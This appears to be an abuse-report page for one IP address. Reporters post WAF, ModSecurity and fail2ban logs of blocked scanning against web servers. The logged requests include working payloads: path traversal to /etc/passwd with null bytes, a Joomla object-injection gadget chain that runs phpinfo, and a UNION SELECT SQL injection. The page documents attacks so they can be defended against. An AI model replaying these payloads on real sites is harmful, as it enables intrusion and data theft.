Anonymous
2026-10-10 04:25:58
(17 hours ago)
[Sat Oct 10 04:25:57.603088 2026] [security2:error] [pid 3955621:tid 3955621] [client 77.110.106.136 ...
show more
[Sat Oct 10 04:25:57.603088 2026] [security2:error] [pid 3955621:tid 3955621] [client 77.110.106.136:35790] [client 77.110.106.136] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "94"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "lithomessiniaki.gr"] [uri "/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"] [unique_id "asm-VXQuP7vNTm1D_fFDPgAAAAM"], referer: https://lithomessiniaki.gr
[Sat Oct 10 04:25:57.613634 2026] [security2:error] [pid 3957198:tid 3957198] [client 77.110.106.136:35798] [client 77.110.106.136] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-
...
show less
Web App Attack
๐ฉ๐ช
Didier Lagaert
2026-10-10 04:09:12
(18 hours ago)
lie-16 : Block Shell attacks=>/pandora_console/ajax.php?page=../../../../../../etc/passwd
Hacking
๐ซ๐ท
conseilgouz
2026-10-10 00:39:48
(21 hours ago)
joe-12 : Block return, carriage return, ... characters=>/index.php?option=com_bfsurvey&controlle ...
show more
joe-12 : Block return, carriage return, ... characters=>/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00(
show less
Hacking
๐บ๐ธ
cwytech
2026-10-09 20:35:31
(1 day ago)
Fleet-wide ban from the Ghostfleet ๐ป. Triggered by scenario: cwy/tpot-http-admin-probing.
Bad Web Bot
Web App Attack
๐ฒ๐พ
Rizzy
2026-10-09 16:56:14
(1 day ago)
Multiple WAF Violations
Brute-Force
Web App Attack
๐ฉ๐ช
FeG Deutschland
2026-10-09 16:22:25
(1 day ago)
Looking for CMS/PHP/SQL vulnerablilities/excessive crawling - 124
Exploited Host
Web App Attack
Anonymous
2026-10-09 15:37:59
(1 day ago)
(mod_security) mod_security triggered on hostname [redacted] 77.110.106.136 (FR/France/-)
SQL Injection
๐บ๐ธ
TPI-Abuse
2026-10-09 15:30:27
(1 day ago)
(mod_security) mod_security (id:211190) triggered by 77.110.106.136 (-): 1 in the last 300 secs; Por ...
show more
(mod_security) mod_security (id:211190) triggered by 77.110.106.136 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Fri Oct 09 11:30:22.893079 2026] [security2:error] [pid 20759:tid 20759] [client 77.110.106.136:45048] ModSecurity: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||etudesoftware.com|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "etudesoftware.com"] [uri "/index.php"] [unique_id "askIjktsmc4hEsnNNvxzhAAAABY"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐ต๐ฑ
dzpk
2026-10-09 13:42:51
(1 day ago)
[09/Oct/2026:15:42:50 +0200] 179155337093.068149 77.110.106.136 37868 HOST 443 [09/Oct/2026:15:42:50 ...
show more
[09/Oct/2026:15:42:50 +0200] 179155337093.068149 77.110.106.136 37868 HOST 443 [09/Oct/2026:15:42:50 +0200] 179155337036.618940 77.110.106.136 37854 HOST 443 [09/Oct/2026:15:42:50 +0200] 17915533701.346973 77.110.106.136 37842 HOST 443
show less
Web App Attack
๐ฉ๐ช
conseilgouz
2026-10-09 10:29:17
(1 day ago)
coe-12 : Block return, carriage return, ... characters=>/index.php?option=com_realtyna&controlle ...
show more
coe-12 : Block return, carriage return, ... characters=>/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00(
show less
Hacking
๐ฉ๐ช
YF
2026-10-09 10:20:20
(1 day ago)
404 errors Vulnerability scan
Web App Attack
๐ณ๐ฑ
Alt255
2026-10-09 06:26:49
(1 day ago)
[ti-26al] Web exploit scanning: 1 suspicious requests detected by fail2ban jail apache-scanner. Exam ...
show more
[ti-26al] Web exploit scanning: 1 suspicious requests detected by fail2ban jail apache-scanner. Example: 77.110.106.136 - - [09/Oct/2026:08:26:32 +0200] "GET / HTTP/1.1" 200 15596 "-" "123}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:4:\"\\0\\0\\0a\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:5:\"cache\";b:1;s:19:\"cache_name_function\";s:6:\"assert\";s:10:\"javascript\";i:9999;s:8:\"feed_url\";s:37:\"phpinfo();JFactory::getConfig();exit;\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";i:1;}\xf0\x9d\x8c\x86"
...
show less
Bad Web Bot
Web App Attack
๐ญ๐บ
bcsaba
2026-10-09 05:13:08
(1 day ago)
Looking for joomla install folder
77.110.106.136 - - [09/Oct/2026:07:12:45 +0200] "GET /installation ...
show more
Looking for joomla install folder
77.110.106.136 - - [09/Oct/2026:07:12:45 +0200] "GET /installation/index.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
show less
Web App Attack
๐ณ๐ฑ
Site.eu
2026-10-09 04:46:21
(1 day ago)
Excessive multi-domain requests
Brute-Force
๐ฑ๐บ
conseilgouz
2026-10-09 03:33:54
(1 day ago)
are-13 : Block SQL injections=>/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extens ...
show more
are-13 : Block SQL injections=>/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL--%20aa()md5)
show less
Hacking